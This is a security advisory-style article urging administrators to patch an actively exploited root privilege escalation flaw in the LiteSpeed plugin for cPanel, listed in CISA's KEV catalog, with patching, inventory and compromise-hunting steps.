CISA: Patch LiteSpeed cPanel Plugin Now — Root Privilege Escalation Under Active Exploit

Patch deadline: June 18, 2026. That is 48 hours from now.

CISA has added a security flaw in the LiteSpeed cPanel Plugin to its Known Exploited Vulnerabilities (KEV) catalog, confirming the vulnerability is being actively exploited in the wild. Federal Civilian Executive Branch agencies are required to remediate by June 18 under Binding Operational Directive 22-01 — but the blast radius extends far beyond government infrastructure.

What Happened

The flaw lives in the LiteSpeed Plugin for cPanel, a combination found across shared hosting environments, VPS stacks, and dedicated servers worldwide. cPanel is estimated to power tens of millions of websites; LiteSpeed is frequently enabled as the default high-performance web server on top of it. The vulnerability allows an attacker to escalate privileges to root on the affected system.

CISA does not add entries to the KEV catalog speculatively. By the time something lands there, working exploits are in active circulation against real targets. This is not a "patch when convenient" situation.

Why It Matters

Root privilege escalation is the worst-case outcome on a Linux server. An attacker with root can:

• Read or exfiltrate every file, database, and credential on the machine
• Extract SSL private keys stored on disk
• Install persistent backdoors or kernel rootkits that survive reboots
• Pivot laterally into internal networks or cloud control planes

Shared hosting amplifies the damage: one compromised cPanel server can expose hundreds or thousands of tenant sites simultaneously. Hosting providers running LiteSpeed at scale are high-value targets for exactly this reason — compromise one box, harvest many accounts.

What to Do

1. Inventory now. Identify every internet-accessible server running cPanel with the LiteSpeed plugin installed. If you use managed hosting, contact your provider today and demand their patch status in writing.

2. Apply the vendor update. LiteSpeed has released a patched version. Update via the cPanel Plugin Manager or the LiteSpeed WebAdmin console. Pin the version and confirm the update applied. Full version details are in The Hacker News advisory.

3. Hunt for compromise indicators. If patching is delayed even by hours, audit immediately: review /root/.ssh/authorized_keys for unfamiliar entries, check crontab -l for all users, scan recently modified files under /etc and /usr/local/cpanel, and look for new accounts with UID 0.

4. Check provider advisories. Major cPanel-based managed hosts should have their own bulletins active. If yours has not communicated yet, escalate through support — silence is not the same as safety.

5. Federal and contractor teams: this is mandatory. BOD 22-01 makes the June 18 deadline a compliance obligation, not a recommendation.

The window to act before this becomes a breach notification exercise is closing fast.